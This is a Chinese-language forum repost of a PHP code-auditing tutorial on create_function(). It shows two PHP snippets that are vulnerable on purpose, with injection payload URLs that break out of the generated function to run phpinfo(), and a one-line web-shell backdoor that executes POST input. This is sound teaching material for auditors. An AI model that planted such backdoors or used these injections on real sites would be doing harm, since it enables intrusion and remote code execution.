PHP代码审计之create_function()函数

行者豆児 發表於 2020-5-28 14:07:00

<h1 id="h2-0">0x00 create_function()简介</h1>
适用范围：<code>PHP 4> = 4.0.1</code>，<code>PHP 5</code>，<code>PHP 7</code>
功能：根据传递的参数创建匿名函数，并为其返回唯一名称。
语法：
<div class="cnblogs_code">
<pre>1 create_function(string $args,string $code)
2 string $args 声明的函数变量部分
3
4 string $code 执行的方法代码部分</pre>
</div>
<h1>0x01 函数功能分析</h1>
案例：
<div class="cnblogs_code">
<pre><?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
?></pre>
</div>
保存为create.php
<img src="https://img2020.cnblogs.com/blog/1937992/202005/1937992-20200528132627947-730152606.png" alt="">
 
 
 分析：
<code>create_function()</code>会创建一个匿名函数（<code>lambda</code>样式）。此处创建了一个叫<code>lambda_1</code>的函数，在第一个<code>echo</code>中显示出名字，并在第二个<code>echo</code>语句中执行了此函数。
create_function()函数会在内部执行 eval()，我们发现是执行了后面的<code>return</code>语句，属于<code>create_function()</code>中的第二个参数<code>string $code</code>位置。
因此，上述匿名函数的创建与执行过程等价于：
<div class="cnblogs_code">
<pre><?php
function lambda_1($a,$b){
return "ln($a) + ln($b) = " . log($a * $b);
}
?></pre>
</div>
<code>create_function()</code>函数在代码审计中，主要用来查找项目中的代码注入和回调后门的情况，熟悉了执行流程，我们可以熟练的实现对代码注入的<code>payload</code>构造，从而进行漏洞挖掘和找出存在的缺陷。
 
<h1>0x02 实现代码注入的案例</h1>
<h2>案例1：</h2>
<div class="cnblogs_code">
<pre><?php
error_reporting(0);
$sort_by = $_GET['sort_by'];
$sorter = 'strnatcasecmp';
$databases=array('1234','4321');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?></pre>
</div>
<code>payload</code>的构造：
<div class="cnblogs_code">
<pre>http://localhost/test1.php?sort_by=%27%22]);}phpinfo();/*</pre>
</div>
 
<img src="https://img2020.cnblogs.com/blog/1937992/202005/1937992-20200528133704647-1679751324.png" alt="">
 
 
 
还原实际的组合过程：
<div class="cnblogs_code">
<pre>$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by '"]);}phpinfo();/*</pre>
</div>
匿名函数实际的执行：
<div class="cnblogs_code">
<pre>function niming($a,$b){
return 1 * ' . $sorter . '($a["' . $sort_by '"]);}phpinfo();/*
}</pre>
</div>
回车换行整理一下：
<div class="cnblogs_code">
<pre>function niming($a,$b){
return 1 * ' . $sorter . '($a["' . $sort_by '"]);
}
phpinfo();/*
}</pre>
</div>
 
<h2>案例2：</h2>
<div class="cnblogs_code">
<pre><?php
$c=$_GET['c'];
$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen($c));");
$array=array('reall long string here,boy','this','midding lenth','larget');
usort($array,$lambda);
print_r($array);
?></pre>
</div>
<code>payload</code>的构造：
<div class="cnblogs_code">
<pre>http://localhost/test2.php?c=1));}phpinfo();/*</pre>
</div>
<img src="https://img2020.cnblogs.com/blog/1937992/202005/1937992-20200528135733970-253135182.png" alt="">
 
 
 还原实际的组合过程：
<div class="cnblogs_code">
<pre>$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen(1));}phpinfo();/*));");</pre>
</div>
匿名函数实际的执行：
<div class="cnblogs_code">
<pre> function ft($a,$b){
return (strlen($a)-strlen($b)+" . "strlen(1));}phpinfo();/*));
}</pre>
</div>
回车换行整理一下：
<div class="cnblogs_code">
<pre> function ft($a,$b){
return (strlen($a)-strlen($b)+" . "strlen(1));
}
phpinfo();
/*));
}</pre>
</div>
 
<h1>0x03 打造后门</h1>
houmen.php
<div class="cnblogs_code">
<pre><?php $func =create_function('',$_POST['cmd']);$func();?></pre>
</div>
<code>create_function()</code>是可以利用当后门的函数，实际上它是通过执行<code>eval</code>实现(此处相当于一句话木马)，访问如下：
<img src="https://img2020.cnblogs.com/blog/1937992/202005/1937992-20200528140551223-1027125403.png" alt="">
 

<h1> 0x04 create_function()被高版本 PHP 废弃</h1>
从<code>PHP 7.2.0</code>开始，<code>create_function()</code>被废弃 
来源：https://www.cnblogs.com/zzjdbk/p/12980483.html

頁: [1]

琼殿技术论坛's Archiver

PHP代码审计之create_function()函数